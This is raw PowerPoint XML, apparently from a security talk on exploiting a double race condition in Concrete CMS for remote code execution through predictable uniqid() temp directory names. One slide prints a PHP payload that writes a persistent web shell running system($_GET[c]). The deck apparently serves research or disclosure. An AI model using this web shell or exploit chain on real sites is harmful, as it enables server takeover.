            <ac:spMk id="7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E42599BB-A637-29FE-3649-34BF558A808A}" dt="2025-03-18T18:14:16.677" v="139" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Adrian Tiron" userId="S::adrian@fortbridge.co.uk::c6c6b3ba-ef3b-4463-9504-cb5d4ad46fde" providerId="AD" clId="Web-{E42599BB-A637-29FE-3649-34BF558A808A}" dt="2025-03-18T18:14:16.677" v="139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="271"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Adrian Tiron" userId="S::adrian@fortbridge.co.uk::c6c6b3ba-ef3b-4463-9504-cb5d4ad46fde" providerId="AD" clId="Web-{E42599BB-A637-29FE-3649-34BF558A808A}" dt="2025-03-18T18:23:40.129" v="154" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Adrian Tiron" userId="S::adrian@fortbridge.co.uk::c6c6b3ba-ef3b-4463-9504-cb5d4ad46fde" providerId="AD" clId="Web-{E42599BB-A637-29FE-3649-34BF558A808A}" dt="2025-03-18T18:23:40.129" v="154" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="273"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Adrian Tiron" userId="S::adrian@fortbridge.co.uk::c6c6b3ba-ef3b-4463-9504-cb5d4ad46fde" providerId="AD" clId="Web-{E42599BB-A637-29FE-3649-34BF558A808A}" dt="2025-03-18T18:04:24.724" v="134" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="273"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000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png>
</file>

<file path=ppt/media/image14.sv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sv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eg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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" r="-3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07238" y="2027384"/>
            <a:ext cx="10377523" cy="1272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74"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4201" b="1" spc="365">
                <a:solidFill>
                  <a:srgbClr val="FCFBFC"/>
                </a:solidFill>
                <a:latin typeface="Kanit Medium"/>
                <a:ea typeface="Kanit Medium"/>
                <a:cs typeface="Kanit Medium"/>
                <a:sym typeface="Kanit Medium"/>
              </a:rPr>
              <a:t>Exploiting a Double Race Condition to RCE in Concrete CMS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5314969" y="0"/>
            <a:ext cx="6876907" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9169210" cy="9144000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-18923" y="0"/>
              <a:ext cx="9188196" cy="9144000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9188196" h="9144000">
                  <a:moveTo>
                    <a:pt x="1489202" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="262128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1085850" y="764413"/>
                    <a:pt x="867156" y="1288161"/>
                    <a:pt x="680212" y="1828292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389255" y="2676271"/>
                    <a:pt x="188468" y="3552444"/>
                    <a:pt x="81026" y="4441952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24892" y="4897247"/>
                    <a:pt x="0" y="5351907"/>
                    <a:pt x="35306" y="5809869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77216" y="6345301"/>
                    <a:pt x="140462" y="6877304"/>
                    <a:pt x="247523" y="7403973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365760" y="7985252"/>
                    <a:pt x="526288" y="8552815"/>
                    <a:pt x="738251" y="9104376"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="754888" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825119" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815975" y="9122029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="698754" y="8818626"/>
                    <a:pt x="596392" y="8507730"/>
                    <a:pt x="506603" y="8190230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="428498" y="7913751"/>
                    <a:pt x="370967" y="7631557"/>
                    <a:pt x="304292" y="7351903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302641" y="7337044"/>
                    <a:pt x="301879" y="7322058"/>
                    <a:pt x="301752" y="7307199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301752" y="7307199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="350647" y="7476744"/>
                    <a:pt x="389763" y="7626350"/>
                    <a:pt x="435864" y="7773797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556260" y="8157845"/>
                    <a:pt x="695071" y="8531352"/>
                    <a:pt x="852932" y="8894064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="970026" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188196" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188196" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655318" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527048" y="198247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351407" y="487299"/>
                    <a:pt x="1191895" y="786003"/>
                    <a:pt x="1046480" y="1093216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1039368" y="1111377"/>
                    <a:pt x="1027684" y="1127252"/>
                    <a:pt x="1012444" y="1139317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1012444" y="1139317"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032129" y="1093216"/>
                    <a:pt x="1051052" y="1046734"/>
                    <a:pt x="1070991" y="1000506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152398" y="811657"/>
                    <a:pt x="1238504" y="625602"/>
                    <a:pt x="1329563" y="442341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1566164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732158" y="848468"/>
            <a:ext cx="4574530" cy="1466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86"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200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PHP uniqid() implementation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9406" y="2642237"/>
            <a:ext cx="4488589" cy="26468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150" spc="6" err="1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Uniqid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6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() relies on seconds and microseconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" spc="6">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2150" spc="6">
              <a:solidFill>
                <a:srgbClr val="5F4776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342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6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Both are deterministic and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" err="1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bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150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-able </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2150">
              <a:solidFill>
                <a:srgbClr val="5F4776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342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150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Let's read some PHP internals code for fun &amp; profit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" err="1">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri (MS)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058845" y="6439286"/>
            <a:ext cx="267146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55075" y="1375066"/>
            <a:ext cx="4773888" cy="1205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29"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400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-  Exploitation plan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921473" y="6394386"/>
            <a:ext cx="2148179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114151" y="6396271"/>
            <a:ext cx="291727" cy="203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11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7406E2F2-8D07-5040-6D57-1BECEB4AF098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881646" y="762637"/>
            <a:ext cx="551982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2403"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>We need to find the name of the temp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> where our file is written(1st step)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7AD852D-B7D4-D608-F159-9BDB18864853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881646" y="1712597"/>
            <a:ext cx="5519829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2403"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>For this we need to make sure the file we download will execute/sleep for a long period of time so we can guess the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A4523C-3E3C-63A2-0651-24CCD4553ADB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881645" y="2967356"/>
            <a:ext cx="551982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2403"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>We’ll use Turbo Intruder to bruteforce and guess the temp dir name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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59A5D5CA-1F5B-92BD-DE93-F99920AFD4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881644" y="3861436"/>
            <a:ext cx="5611269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2403"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Our download file + temp dir will get deleted eventually so it will need to write a permanent shell for persistence and RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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31CDF561-8E18-4B3C-DCEF-270FEA9A6D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881644" y="4994276"/>
            <a:ext cx="561126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2403"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="6">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>How do we trigger our download file before it gets deleted? (2nd race condition)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn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19053" y="691085"/>
            <a:ext cx="11020842" cy="442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03"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5407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–temporary shell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1013" y="1769577"/>
            <a:ext cx="10773353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03"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="2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Temp shell written first which will write a perm shell in the parent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="2" err="1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dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" spc="2">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)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625440" y="6230597"/>
            <a:ext cx="2163419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003539" y="6420851"/>
            <a:ext cx="267146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12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6506" y="2650977"/>
            <a:ext cx="9451822" cy="30434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969"/>
              </a:lnSpc>
            </a:pP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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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php</a:t>
            </a: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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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set_time_limit</a:t>
            </a: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(0); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:b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sleep(35); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:b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echo '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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php</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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file_put_contents</a:t>
            </a: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("../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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shell.php</a:t>
            </a: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","&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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phpsystem</a:t>
            </a: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(\$_GET[c]) ;");'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:b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echo '?&gt;' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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str_repeat</a:t>
            </a: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("A",50000000); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:b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flush(); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11" err="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ob_flush</a:t>
            </a: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(); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" spc="-11">
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
                <a:cs typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-11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?&gt;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85800" y="3513891"/>
            <a:ext cx="2264372" cy="1068916"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="936433" cy="4420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36433" cy="442052"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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77800" y="-38100"/>
              <a:ext cx="682433" cy="4801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36383" y="849198"/>
            <a:ext cx="10760069" cy="99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11"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6082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18407" y="1774688"/>
            <a:ext cx="9135687" cy="99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11"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6082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Timeline of race conditions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295262" y="6389306"/>
            <a:ext cx="1896310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114151" y="6439286"/>
            <a:ext cx="420775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13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2824807" y="3513891"/>
            <a:ext cx="2264372" cy="1068916"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="936433" cy="44205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36433" cy="442052"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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4777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77800" y="-38100"/>
              <a:ext cx="682433" cy="4801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963814" y="3513891"/>
            <a:ext cx="2264372" cy="1068916"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="936433" cy="44205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936433" cy="442052"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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4777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77800" y="-38100"/>
              <a:ext cx="682433" cy="4801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7102821" y="3513891"/>
            <a:ext cx="2264372" cy="1068916"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="936433" cy="44205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936433" cy="442052"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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4777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177800" y="-38100"/>
              <a:ext cx="682433" cy="4801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241828" y="3513891"/>
            <a:ext cx="2264372" cy="1068916"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="936433" cy="44205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936433" cy="442052"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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4777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177800" y="-38100"/>
              <a:ext cx="682433" cy="4801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310153" y="3768331"/>
            <a:ext cx="1196615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549"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-51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TO = start search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1549"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-30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for volatile dir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456124" y="3644254"/>
            <a:ext cx="1158351" cy="7170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43"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="143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T1-found dir,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1943"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-63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start search for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1943"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-63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test.php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645007" y="3799642"/>
            <a:ext cx="1122494" cy="4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609"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="8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T2=test.php is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1609"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="143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written locally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683143" y="3684504"/>
            <a:ext cx="1219115" cy="776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1"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-10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T3=test.php is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-24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found &amp; exec-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-27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ed, perm shell is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="25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written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905741" y="3711349"/>
            <a:ext cx="1116693" cy="611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34"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="143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T4=test.php &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1634"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1432" spc="-18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volatile dir are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1634"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="143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deleted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74019" y="128123"/>
            <a:ext cx="11818953" cy="7099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90"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4207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–Timeline of 2 races Explained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295262" y="6384226"/>
            <a:ext cx="1921710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114151" y="6402416"/>
            <a:ext cx="359324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788A6E-12BF-E851-ABEF-8E95052254EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376392" y="1386611"/>
            <a:ext cx="10889225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T0 you start the upload request AND you also start searching for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the</a:t>
            </a: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 volatile </a:t>
            </a:r>
            <a:r>
